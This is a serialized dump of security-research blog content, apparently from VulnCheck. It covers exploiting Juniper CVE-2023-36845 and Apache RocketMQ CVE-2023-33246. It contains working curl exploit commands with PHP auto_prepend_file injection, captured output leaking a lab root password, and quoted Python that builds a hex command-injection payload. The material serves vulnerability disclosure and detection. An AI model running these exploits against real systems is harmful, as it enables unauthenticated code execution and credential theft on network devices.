,[1373,88631,6765],{"class":4640},[1373,88633,88634,88636,88638,88640,88642,88644,88646,88648,88650,88652,88654,88656],{"class":1375,"line":4915},[1373,88635,8246],{"class":1397},[1373,88637,48983],{"class":2206},[1373,88639,87750],{"class":1391},[1373,88641,183],{"class":1387},[1373,88643,6391],{"class":1391},[1373,88645,183],{"class":1387},[1373,88647,87759],{"class":1391},[1373,88649,183],{"class":1387},[1373,88651,87764],{"class":1391
},[1373,88653,183],{"class":1387},[1373,88655,2180],{"class":4640},[1373,88657,6765],{"class":1397},[1373,88659,88660,88662,88664,88666,88668,88670,88672,88674,88676,88678,88680,88682,88684,88686,88688,88690],{"class":1375,"line":4931},[1373,88661,8246],{"class":1397},[1373,88663,30586],{"class":2206},[1373,88665,87779],{"class":1391},[1373,88667,183],{"class":1387},[1373,88669,49025],{"class":1391},[1373,88671,183],{"class":1387},[1373,88673,87788],{"class":1391},[1373,88675,183],{"class":1387},[1373,88677,87793],{"class":1391},[1373,88679,183],{"class":1387},[1373,88681,87798],{"class":1391},[1373,88683,183],{"class":1387},[1373,88685,49066],{"class":1391},[1373,88687,183],{"class":1387},[1373,88689,2180],{"class":4640},[1373,88691,6765],{"class":1397},[1373,88693,88694,88696,88698,88700,88702,88704,88706,88708,88710,88712,88714,88716,88718,88720],{"class":1375,"line":4947},[1373,88695,8246],{"class":1397},[1373,88697,51864],{"class":2206},[1373,88699,5384],{"class":4640},[1373,88701,15072],{"class":1391},[1373,88703,87821],{"class":1391},[1373,88705,27425],{"class":1391},[1373,88707,87826],{"class":1391},[1373,88709,87829],{"class":1391},[1373,88711,87832],{"class":1391},[1373,88713,87835],{"class":1391},[1373,88715,11852],{"class":1397},[1373,88717,87840],{"class":1391},[1373,88719,74628],{"class":4640},[1373,88721,6765],{"class":1397},[1373,88723,88724,88726,88728,88730,88732,88734,88736,88738,88740,88742,88744,88746,88748,88750,88752,88754],{"class":1375,"line":4952},[1373,88725,8246],{"class":1397},[1373,88727,30586],{"class":2206},[1373,88729,87779],{"class":1391},[1373,88731,183],{"class":1387},[1373,88733,87857],{"class":1391},[1373,88735,183],{"class":1387},[1373,88737,87788],{"class":1391},[1373,88739,1388],{"class":1387},[1373,88741,87866],{"class":1391},[1373,88743,1388],{"class":1387},[1373,88745,87798],{"class":1391},[1373,88747,183],{"class":1387},[1373,88749,87875],{"class":1391},[1373,88751,183],{"class":1387},[1373,88753,2180],{"class":4640},[137
3,88755,6765],{"class":1397},[1373,88757,88758,88760,88762],{"class":1375,"line":6776},[1373,88759,48971],{"class":1397},[1373,88761,87888],{"class":2206},[1373,88763,6765],{"class":4640},[18,88765,88766],{},"When an attacker uses this form of attack, httpd.log (and all other logs as far as we can tell) are essentially useless. Determining if you’ve been compromised by a careful attacker will be quite difficult.",[61,88768,88770],{"id":88769},"summary","Summary",[18,88772,88773],{},"In this blog, we demonstrated how CVE-2023-36845, a vulnerability flagged as “Medium” severity by Juniper, can be used to remotely execute arbitrary code without authentication. We’ve turned a multi-step (but very good) exploit into an exploit that can be written using a single curl command and appears to affect more (older) systems.",[18,88775,88776],{},"Additionally, we found that the vast majority of internet-facing Juniper systems remain vulnerable to this issue. There is some evidence of exploitation in the wild, and given how slow patching is going, we suspect this will be a useful exploit for attackers for quite some time.",[61,88778,87045],{"id":87044},[993,88780,88782],{"id":88781},"cve-clarification","CVE Clarification",[18,88784,88785,88786,88790],{},"The original advisory published by Juniper (",[47,88787,88789],{"href":87394,"rel":88788},[51],"2023-08","), contains five CVE identifiers, but only two CVE descriptions (they are repeated between the five) and one (entirely erroneous) CVSSv3 score for all of the vulnerabilities. There is essentially no way to distinguish CVE-2023-36844 and CVE-2023-36845 from CVE-2023-36846, or CVE-2023-36847 from CVE-2023-36851. 
To be clear, this is not how CVE descriptions should work, and Juniper should do better.",[18,88792,88793],{},"watchTowr refers to CVE-2023-36845 and CVE-2023-36846 in their writeup, so, for consistency, we do as well.",[993,88795,88797],{"id":88796},"secondary-file-upload-mechanism","Secondary File Upload Mechanism",[18,88799,88800,88801,88803],{},"Our test system has the Appweb file upload mechanism enabled. An attacker could upload arbitrary files to ",[886,88802,87452],{}," like so:",[1354,88805,88807],{"className":31740,"code":88806,"language":2186,"meta":219,"style":219},"curl -v -F 'upload=@\u002Ftmp\u002Fphp.ini' http:\u002F\u002F10.12.72.1\u002F\n",[886,88808,88809],{"__ignoreMap":219},[1373,88810,88811,88813,88815,88817,88819,88822,88824],{"class":1375,"line":1376},[1373,88812,1557],{"class":2206},[1373,88814,45584],{"class":2209},[1373,88816,88481],{"class":2209},[1373,88818,4713],{"class":1387},[1373,88820,88821],{"class":1391},"upload=@\u002Ftmp\u002Fphp.ini",[1373,88823,1388],{"class":1387},[1373,88825,88826],{"class":1391}," http:\u002F\u002F10.12.72.1\u002F\n",[18,88828,88829],{},"On the firewall, a file will be created named “MPR_%d_%d_%d.tmp”, where the first %d is the httpd process ID, the second %d is a 16-bit number derived from the current time, and the last %d is a one-up counter. 
These values are small enough that they could be brute-forced and used with the original watchTowr exploit.",[1354,88831,88833],{"className":31740,"code":88832,"language":2186,"meta":219,"style":219},"root@junSRX210% ls -l\ntotal 32\n-rw-r--r--  1 nobody  wheel 96 Sep 13 23:15 MPR_1479_59421_1.tmp\nroot@junSRX210% cat MPR_1479_59421_1.tmp\nallow_url_include=On\nauto_prepend_file=\"data:\u002F\u002Ftext\u002Fplain;base64,PD8KICAgcGhwaW5mbygpOwo\u002FPg==\"\n",[886,88834,88835,88845,88852,88879,88887,88896],{"__ignoreMap":219},[1373,88836,88837,88840,88843],{"class":1375,"line":1376},[1373,88838,88839],{"class":2206},"root@junSRX210%",[1373,88841,88842],{"class":1391}," ls",[1373,88844,70286],{"class":2209},[1373,88846,88847,88849],{"class":1375,"line":220},[1373,88848,43165],{"class":2206},[1373,88850,88851],{"class":5467}," 32\n",[1373,88853,88854,88856,88858,88861,88864,88867,88870,88873,88876],{"class":1375,"line":1266},[1373,88855,55888],{"class":2206},[1373,88857,55853],{"class":5467},[1373,88859,88860],{"class":1391}," nobody",[1373,88862,88863],{"class":1391},"  wheel",[1373,88865,88866],{"class":5467}," 96",[1373,88868,88869],{"class":1391}," Sep",[1373,88871,88872],{"class":5467}," 13",[1373,88874,88875],{"class":1391}," 23:15",[1373,88877,88878],{"class":1391}," 
MPR_1479_59421_1.tmp\n",[1373,88880,88881,88883,88885],{"class":1375,"line":1852},[1373,88882,88839],{"class":2206},[1373,88884,70263],{"class":1391},[1373,88886,88878],{"class":1391},[1373,88888,88889,88891,88893],{"class":1375,"line":4692},[1373,88890,87924],{"class":4640},[1373,88892,5417],{"class":1397},[1373,88894,88895],{"class":1391},"On\n",[1373,88897,88898,88900,88902,88904,88907],{"class":1375,"line":4724},[1373,88899,87511],{"class":4640},[1373,88901,5417],{"class":1397},[1373,88903,183],{"class":1387},[1373,88905,88906],{"class":1391},"data:\u002F\u002Ftext\u002Fplain;base64,PD8KICAgcGhwaW5mbygpOwo\u002FPg==",[1373,88908,19057],{"class":1387},[61,88910,88912],{"id":88911},"root-credentials-disclosure","Root Credentials Disclosure",[18,88914,88915,88916,88919,88920,88923,88924,88926],{},"Using the file disclosure mechanism mentioned above, we are able to leak the root credentials as they were at configuration time. We have no idea if this works on even slightly modern Juniper, but it was a neat tidbit. There is a file called ",[886,88917,88918],{},"wiz_config_server.txt"," sitting in ",[886,88921,88922],{},"\u002Fvar\u002Ftmp\u002F",". 
Here is a very truncated version that shows the ",[886,88925,48771],{}," user password:",[1354,88928,88930],{"className":31740,"code":88929,"language":2186,"meta":219,"style":219},"$ curl -kv \"http:\u002F\u002F10.12.72.1\u002Fabout.php?PHPRC=\u002Fdev\u002Ffd\u002F0\" --data-binary 'auto_prepend_file=\"\u002Fvar\u002Ftmp\u002Fwiz_config_server.txt\"'\n*   Trying 10.12.72.1:80...\n* TCP_NODELAY set\n* Connected to 10.12.72.1 (10.12.72.1) port 80 (#0)\n> POST \u002Fabout.php?PHPRC=\u002Fdev\u002Ffd\u002F0 HTTP\u002F1.1\n> Host: 10.12.72.1\n> User-Agent: curl\u002F7.68.0\n> Accept: *\u002F*\n> Content-Length: 50\n> Content-Type: application\u002Fx-www-form-urlencoded\n>\n* upload completely sent off: 50 out of 50 bytes\n* Mark bundle as not supporting multiuse\n\u003C HTTP\u002F1.1 200 OK\n\u003C Date: Wed, 13 Sep 2023 23:27:51 GMT\n\u003C Server: Embedthis-Appweb\u002F3.2.3\n\u003C Cache-Control: no-cache\n\u003C ETag: \"1e0cc-40e-51b0b0ec\"\n\u003C Content-Type: text\u002Fhtml\n\u003C Connection: keep-alive\n\u003C Keep-Alive: timeout=120, max=199\n\u003C Last-Modified: Wed, 13 Sep 2023 23:27:51 GMT\n\u003C x-powered-by: PHP\u002F5.3.2\n\u003C Transfer-Encoding: 
chunked\n\u003C\n…\n\",\\\\\\\"rootpassword\\\\\\\":\\\\\\\"labpass1\\\\\\\",\n…\n",[886,88931,88932,88956,88963,88969,88982,88993,89000,89006,89018,89025,89032,89036,89043,89049,89056,89063,89070,89077,89091,89098,89105,89125,89132,89139,89145,89149,89154,89178],{"__ignoreMap":219},[1373,88933,88934,88936,88938,88940,88942,88945,88947,88949,88951,88954],{"class":1375,"line":1376},[1373,88935,4644],{"class":2206},[1373,88937,2222],{"class":1391},[1373,88939,82377],{"class":2209},[1373,88941,4883],{"class":1387},[1373,88943,88944],{"class":1391},"http:\u002F\u002F10.12.72.1\u002Fabout.php?PHPRC=\u002Fdev\u002Ffd\u002F0",[1373,88946,183],{"class":1387},[1373,88948,87572],{"class":2209},[1373,88950,4713],{"class":1387},[1373,88952,88953],{"class":1391},"auto_prepend_file=\"\u002Fvar\u002Ftmp\u002Fwiz_config_server.txt\"",[1373,88955,76063],{"class":1387},[1373,88957,88958,88960],{"class":1375,"line":220},[1373,88959,35613],{"class":1397},[1373,88961,88962],{"class":4640},"   Trying 10.12.72.1:80...\n",[1373,88964,88965,88967],{"class":1375,"line":1266},[1373,88966,35613],{"class":1397},[1373,88968,76077],{"class":4640},[1373,88970,88971,88973,88976,88979],{"class":1375,"line":1852},[1373,88972,35613],{"class":1397},[1373,88974,88975],{"class":4640}," Connected to 10.12.72.1 (",[1373,88977,88978],{"class":2206},"10.12.72.1",[1373,88980,88981],{"class":4640},") port 80 (#0)\n",[1373,88983,88984,88986,88988,88991],{"class":1375,"line":4692},[1373,88985,5384],{"class":1397},[1373,88987,76355],{"class":2206},[1373,88989,88990],{"class":1391}," \u002Fabout.php?PHPRC=\u002Fdev\u002Ffd\u002F0",[1373,88992,35589],{"class":1391},[1373,88994,88995,88997],{"class":1375,"line":4724},[1373,88996,5384],{"class":1397},[1373,88998,88999],{"class":4640}," Host: 
10.12.72.1\n",[1373,89001,89002,89004],{"class":1375,"line":4756},[1373,89003,5384],{"class":1397},[1373,89005,35603],{"class":4640},[1373,89007,89008,89010,89012,89014,89016],{"class":1375,"line":4768},[1373,89009,5384],{"class":1397},[1373,89011,35610],{"class":4640},[1373,89013,35613],{"class":1397},[1373,89015,2180],{"class":4640},[1373,89017,35618],{"class":1397},[1373,89019,89020,89022],{"class":1375,"line":4792},[1373,89021,5384],{"class":1397},[1373,89023,89024],{"class":4640}," Content-Length: 50\n",[1373,89026,89027,89029],{"class":1375,"line":4798},[1373,89028,5384],{"class":1397},[1373,89030,89031],{"class":4640}," Content-Type: application\u002Fx-www-form-urlencoded\n",[1373,89033,89034],{"class":1375,"line":4806},[1373,89035,6765],{"class":1397},[1373,89037,89038,89040],{"class":1375,"line":4817},[1373,89039,35613],{"class":1397},[1373,89041,89042],{"class":4640}," upload completely sent off: 50 out of 50 bytes\n",[1373,89044,89045,89047],{"class":1375,"line":4825},[1373,89046,35613],{"class":1397},[1373,89048,76148],{"class":4640},[1373,89050,89051,89053],{"class":1375,"line":4835},[1373,89052,11852],{"class":1397},[1373,89054,89055],{"class":4640}," HTTP\u002F1.1 200 OK\n",[1373,89057,89058,89060],{"class":1375,"line":4843},[1373,89059,11852],{"class":1397},[1373,89061,89062],{"class":4640}," Date: Wed, 13 Sep 2023 23:27:51 GMT\n",[1373,89064,89065,89067],{"class":1375,"line":4849},[1373,89066,11852],{"class":1397},[1373,89068,89069],{"class":4640}," Server: Embedthis-Appweb\u002F3.2.3\n",[1373,89071,89072,89074],{"class":1375,"line":4877},[1373,89073,11852],{"class":1397},[1373,89075,89076],{"class":4640}," Cache-Control: no-cache\n",[1373,89078,89079,89081,89084,89086,89089],{"class":1375,"line":4915},[1373,89080,11852],{"class":1397},[1373,89082,89083],{"class":4640}," ETag: 
",[1373,89085,183],{"class":1387},[1373,89087,89088],{"class":1391},"1e0cc-40e-51b0b0ec",[1373,89090,19057],{"class":1387},[1373,89092,89093,89095],{"class":1375,"line":4931},[1373,89094,11852],{"class":1397},[1373,89096,89097],{"class":4640}," Content-Type: text\u002Fhtml\n",[1373,89099,89100,89102],{"class":1375,"line":4947},[1373,89101,11852],{"class":1397},[1373,89103,89104],{"class":4640}," Connection: keep-alive\n",[1373,89106,89107,89109,89112,89114,89117,89120,89122],{"class":1375,"line":4952},[1373,89108,11852],{"class":1397},[1373,89110,89111],{"class":4640}," Keep-Alive: timeout",[1373,89113,5417],{"class":1397},[1373,89115,89116],{"class":1391},"120,",[1373,89118,89119],{"class":4640}," max",[1373,89121,5417],{"class":1397},[1373,89123,89124],{"class":1391},"199\n",[1373,89126,89127,89129],{"class":1375,"line":6776},[1373,89128,11852],{"class":1397},[1373,89130,89131],{"class":4640}," Last-Modified: Wed, 13 Sep 2023 23:27:51 GMT\n",[1373,89133,89134,89136],{"class":1375,"line":6781},[1373,89135,11852],{"class":1397},[1373,89137,89138],{"class":4640}," x-powered-by: PHP\u002F5.3.2\n",[1373,89140,89141,89143],{"class":1375,"line":7524},[1373,89142,11852],{"class":1397},[1373,89144,76297],{"class":4640},[1373,89146,89147],{"class":1375,"line":7530},[1373,89148,35662],{"class":1397},[1373,89150,89151],{"class":1375,"line":7546},[1373,89152,89153],{"class":2206},"…\n",[1373,89155,89156,89159,89162,89165,89167,89169,89171,89174,89176],{"class":1375,"line":7571},[1373,89157,89158],{"class":2206},"\",",[1373,89160,89161],{"class":2326},"\\\\\\\"",[1373,89163,89164],{"class":2206},"rootpassword",[1373,89166,89161],{"class":2326},[1373,89168,4606],{"class":2206},[1373,89170,89161],{"class":2326},[1373,89172,89173],{"class":2206},"labpass1",[1373,89175,89161],{"class":2326},[1373,89177,9062],{"class":2206},[1373,89179,89180],{"class":1375,"line":7598},[1373,89181,89153],{"class":2206},[2901,89183,89184],{},"html pre.shiki code .sR7ES, html code.shiki 
.sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: 
var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":89186},[89187,89188,89189,89190,89191,89192,89193,89197],{"id":3520,"depth":220,"text":20},{"id":11272,"depth":220,"text":11273},{"id":87496,"depth":220,"text":87497},{"id":87899,"depth":220,"text":87900},{"id":88414,"depth":220,"text":88415},{"id":88769,"depth":220,"text":88770},{"id":87044,"depth":220,"text":87045,"children":89194},[89195,89196],{"id":88781,"depth":1266,"text":88782},{"id":88796,"depth":1266,"text":88797},{"id":88911,"depth":220,"text":88912},"Learn about 
VulnCheck's development of an exploit for CVE-2023-36845, leading to stealthy code execution on Juniper firewalls, while also assessing the prevalence of unpatched systems in the wild.",{"slug":89200},"juniper-cve-2023-36845","\u002Fblog\u002Fjuniper-cve-2023-36845",{"title":35931,"description":89198},"blog\u002Fjuniper-cve-2023-36845",[242],"ROw9XYsws8k15BFBUFBxC73bLlY6igz1kV08IrtLavo",{"id":89207,"title":83500,"articles":89208,"authors":89232,"body":89234,"date":89923,"description":89924,"extension":234,"image":7,"link":7,"meta":89925,"navigation":237,"path":89927,"seo":89928,"series":7,"stem":89929,"subtype":7,"tags":89930,"__hash__":89931},"blog\u002Fblog\u002Frocketmq-exploit-payloads.md",[89209,89213,89216,89220,89224,89228],{"title":89210,"source":3494,"link":89211,"date":89212},"Risky Biz News: China cracks down on the SE Asia scam call center problem","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Fchina-cracks-down-on-se-asia-scam-call-centers","2023-09-06",{"title":89214,"source":39566,"link":89215,"date":89212},"A new Agent Tesla variant. Hot wallet hacks. DevSecOps and AI. Notes on the labor market. 
Two threats in a hybrid war: Fancy Bear and NoName057(16).","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F170",{"title":89217,"source":14373,"link":89218,"date":89219},"CISA warns of critical Apache RocketMQ bug exploited in attacks","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fcisa-warns-of-critical-apache-rocketmq-bug-exploited-in-attacks\u002F","2023-09-07",{"title":89221,"source":57680,"link":89222,"date":89223},"CISA Adds Critical RocketMQ Bug to Must-Patch List","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fcisa-critical-rocketmq-bug\u002F","2023-09-08",{"title":89225,"source":14390,"link":89226,"date":89227},"US CISA ADDED CRITICAL APACHE ROCKETMQ FLAW TO ITS KNOWN EXPLOITED VULNERABILITIES CATALOG","https:\u002F\u002Fsecurityaffairs.com\u002F150551\u002Fhacking\u002Fcisa-apache-rocketmq-known-exploited-vulnerabilities-catalog.html","2023-09-09",{"title":89229,"source":11233,"link":89230,"date":89231},"CISA adds critical Apache RocketMQ flaw in KEV catalog","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Fcisa-adds-critical-apache-rocketmq-flaw-in-kev-catalog","2023-09-10",[89233],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":89235,"toc":89916},[89236,89256,89259,89268,89274,89277,89280,89289,89570,89573,89590,89597,89836,89842,89846,89852,89856,89862,89866,89903,89905,89908,89910,89913],[18,89237,89238,89243,89244,89249,89250,89255],{},[47,89239,89242],{"href":89240,"rel":89241},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-33246",[51],"CVE-2023-33246"," is an easy to exploit vulnerability affecting Apache ",[47,89245,89248],{"href":89246,"rel":89247},"https:\u002F\u002Frocketmq.apache.org\u002F",[51],"RocketMQ",". The vulnerability allows a remote and unauthenticated attacker to update the RocketMQ broker configuration in order to abuse a command injection. 
",[47,89251,89254],{"href":89252,"rel":89253},"https:\u002F\u002Fblogs.juniper.net\u002Fen-us\u002Fthreat-research\u002Fdreambus-botnet-resurfaces-targets-rocketmq-vulnerability",[51],"Juniper Networks"," has reported that exploitation of this issue has been ongoing since June 2023.",[18,89257,89258],{},"Exploitation occurs via a custom remoting protocol to the RocketMQ broker ports (by default 10909 and 10911). That’s important to note because neither Shodan nor Censys specifically detects this protocol. Shodan does an especially bad job of indexing these ports. That makes it hard to determine the actual scope of vulnerable systems in the wild.",[18,89260,89261,89262,89267],{},"Fortunately, Censys can be manipulated into giving us some insight. By searching for hosts that expose tcp\u002F9876 (RocketMQ nameserver) and one of the default broker ports (tcp\u002F10909 and tcp\u002F10911), we find approximately ",[47,89263,89266],{"href":89264,"rel":89265},"https:\u002F\u002Fsearch.censys.io\u002Fsearch?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=services.port%3D9876+and+%28services.port%3D10909+or+services.port%3D10911%29",[51],"4500"," potentially affected systems. However, the extreme concentration of systems in one country does call into question how many of these may be honeypots.",[18,89269,89270],{},[68,89271],{":width":10862,"alt":89272,"src":89273},"Potential RocketMQ brokers on Censys","\u002Fblog\u002Frocketmq-exploit-payloads\u002Frocketmq-censys.png",[18,89275,89276],{},"The RocketMQ broker was never meant to be exposed to the internet. The interface is insecure by design and offers a variety of administrative functions. Updating the broker configuration is only one of those functions. 
Another one, useful for defenders, is downloading the broker configuration, freely without authentication.",[18,89278,89279],{},"When the attacker updates the broker configuration with a malicious “rocketmqHome” variable, the attacker payload doesn’t get executed immediately. Instead, the payload is written into the configuration file. Some seconds later, a process parses the configuration, and executes a shell command containing the malicious variable, resulting in attacker code execution. The important part is, unless they overwrite it, the attacker payload persists in the configuration indefinitely.",[18,89281,89282,89283,89288],{},"If you understand the protocol, it’s very easy to download the configuration file so that you can examine it for indicators of compromise. Looking at some of the public exploits, such as ",[47,89284,89287],{"href":89285,"rel":89286},"https:\u002F\u002Fvulncheck.com\u002Fxdb\u002Fb486dcf3f31d",[51],"XDB-b486dcf3f31d",", you can see some attackers are just throwing blobs of hex at victims.",[1354,89290,89292],{"className":11719,"code":89291,"language":11721,"meta":219,"style":219},"if '__main__' == __name__:\n ip = sys.argv[1]\n port = int(sys.argv[2])    \n command = ' '.join(sys.argv[3:]).strip()\n hex_payload_prefix = '000000cd000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f20'    \n hex_payload_suffix = '3b0a'\n payload = bytes.fromhex(hex_payload_prefix) + command.encode() + bytes.fromhex(hex_payload_suffix)\n hex_payload_length = hex(len(payload) - 4)[2:]\n payload = payload.hex().replace('000000cd000000','000000' + hex_payload_length + '000000')\n payload = 
bytes.fromhex(payload)\n",[886,89293,89294,89312,89333,89358,89393,89409,89423,89469,89502,89552],{"__ignoreMap":219},[1373,89295,89296,89298,89300,89303,89305,89307,89310],{"class":1375,"line":1376},[1373,89297,4637],{"class":4636},[1373,89299,4713],{"class":1387},[1373,89301,89302],{"class":1391},"__main__",[1373,89304,1388],{"class":1387},[1373,89306,16406],{"class":1397},[1373,89308,89309],{"class":9383}," __name__",[1373,89311,11747],{"class":1383},[1373,89313,89314,89317,89319,89322,89324,89327,89329,89331],{"class":1375,"line":220},[1373,89315,89316],{"class":4640}," ip ",[1373,89318,5417],{"class":1397},[1373,89320,89321],{"class":4640}," sys",[1373,89323,59],{"class":1383},[1373,89325,89326],{"class":63570},"argv",[1373,89328,7035],{"class":1383},[1373,89330,467],{"class":5467},[1373,89332,7103],{"class":1383},[1373,89334,89335,89338,89340,89342,89344,89346,89348,89350,89352,89354,89356],{"class":1375,"line":1266},[1373,89336,89337],{"class":4640}," port ",[1373,89339,5417],{"class":1397},[1373,89341,48340],{"class":9165},[1373,89343,1384],{"class":1383},[1373,89345,70245],{"class":11735},[1373,89347,59],{"class":1383},[1373,89349,89326],{"class":63570},[1373,89351,7035],{"class":1383},[1373,89353,353],{"class":5467},[1373,89355,48026],{"class":1383},[1373,89357,47181],{"class":4640},[1373,89359,89360,89362,89364,89366,89368,89370,89373,89375,89377,89379,89381,89383,89385,89388,89391],{"class":1375,"line":1852},[1373,89361,18006],{"class":4640},[1373,89363,5417],{"class":1397},[1373,89365,4713],{"class":1387},[1373,89367,4713],{"class":1387},[1373,89369,59],{"class":1383},[1373,89371,89372],{"class":11735},"join",[1373,89374,1384],{"class":1383},[1373,89376,70245],{"class":11735},[1373,89378,59],{"class":1383},[1373,89380,89326],{"class":63570},[1373,89382,7035],{"class":1383},[1373,89384,491],{"class":5467},[1373,89386,89387],{"class":1383},":]).",[1373,89389,89390],{"class":11735},"strip",[1373,89392,27326],{"class":1383},[1373,89394,89395,89398,89400,894
02,89405,89407],{"class":1375,"line":4692},[1373,89396,89397],{"class":4640}," hex_payload_prefix ",[1373,89399,5417],{"class":1397},[1373,89401,4713],{"class":1387},[1373,89403,89404],{"class":1391},"000000cd000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f20",[1373,89406,1388],{"class":1387},[1373,89408,47181],{"class":4640},[1373,89410,89411,89414,89416,89418,89421],{"class":1375,"line":4724},[1373,89412,89413],{"class":4640}," hex_payload_suffix ",[1373,89415,5417],{"class":1397},[1373,89417,4713],{"class":1387},[1373,89419,89420],{"class":1391},"3b0a",[1373,89422,76063],{"class":1387},[1373,89424,89425,89428,89430,89432,89434,89437,89439,89442,89444,89446,89448,89450,89452,89454,89456,89458,89460,89462,89464,89467],{"class":1375,"line":4756},[1373,89426,89427],{"class":4640}," payload ",[1373,89429,5417],{"class":1397},[1373,89431,57298],{"class":9165},[1373,89433,59],{"class":1383},[1373,89435,89436],{"class":11735},"fromhex",[1373,89438,1384],{"class":1383},[1373,89440,89441],{"class":11735},"hex_payload_prefix",[1373,89443,2230],{"class":1383},[1373,89445,15478],{"class":1397},[1373,89447,16726],{"class":4640},[1373,89449,59],{"class":1383},[1373,89451,11778],{"class":11735},[1373,89453,7514],{"class":1383},[1373,89455,15478],{"class":1397},[1373,89457,57298],{"class":9165},[1373,89459,59],{"class":1383},[1373,89461,89436],{"class":11735},[1373,89463,1384],{"class":1383},[1373,89465,89466],{"class":11735},"hex_payload_suffix",[1373,89468,11875],{"class":1383},[1373,89470,89471,89474,89476,89479,89481,89484,89486,89488,89490,89492,89494,89497,89499],{"class":1375,"line":4768},[1373,89472,89473],{"class":4640}," hex_payload_length ",[1373,89475,5417],{"class":1397},[1373,89477,89478],{"class":1379}," 
hex",[1373,89480,1384],{"class":1383},[1373,89482,89483],{"class":1379},"len",[1373,89485,1384],{"class":1383},[1373,89487,11736],{"class":11735},[1373,89489,2230],{"class":1383},[1373,89491,27425],{"class":1397},[1373,89493,55913],{"class":5467},[1373,89495,89496],{"class":1383},")[",[1373,89498,353],{"class":5467},[1373,89500,89501],{"class":1383},":]\n",[1373,89503,89504,89506,89508,89510,89512,89515,89517,89520,89522,89524,89527,89529,89531,89533,89536,89538,89540,89542,89544,89546,89548,89550],{"class":1375,"line":4792},[1373,89505,89427],{"class":4640},[1373,89507,5417],{"class":1397},[1373,89509,37845],{"class":4640},[1373,89511,59],{"class":1383},[1373,89513,89514],{"class":11735},"hex",[1373,89516,16355],{"class":1383},[1373,89518,89519],{"class":11735},"replace",[1373,89521,1384],{"class":1383},[1373,89523,1388],{"class":1387},[1373,89525,89526],{"class":1391},"000000cd000000",[1373,89528,1388],{"class":1387},[1373,89530,5437],{"class":1383},[1373,89532,1388],{"class":1387},[1373,89534,89535],{"class":1391},"000000",[1373,89537,1388],{"class":1387},[1373,89539,15478],{"class":1397},[1373,89541,89473],{"class":11735}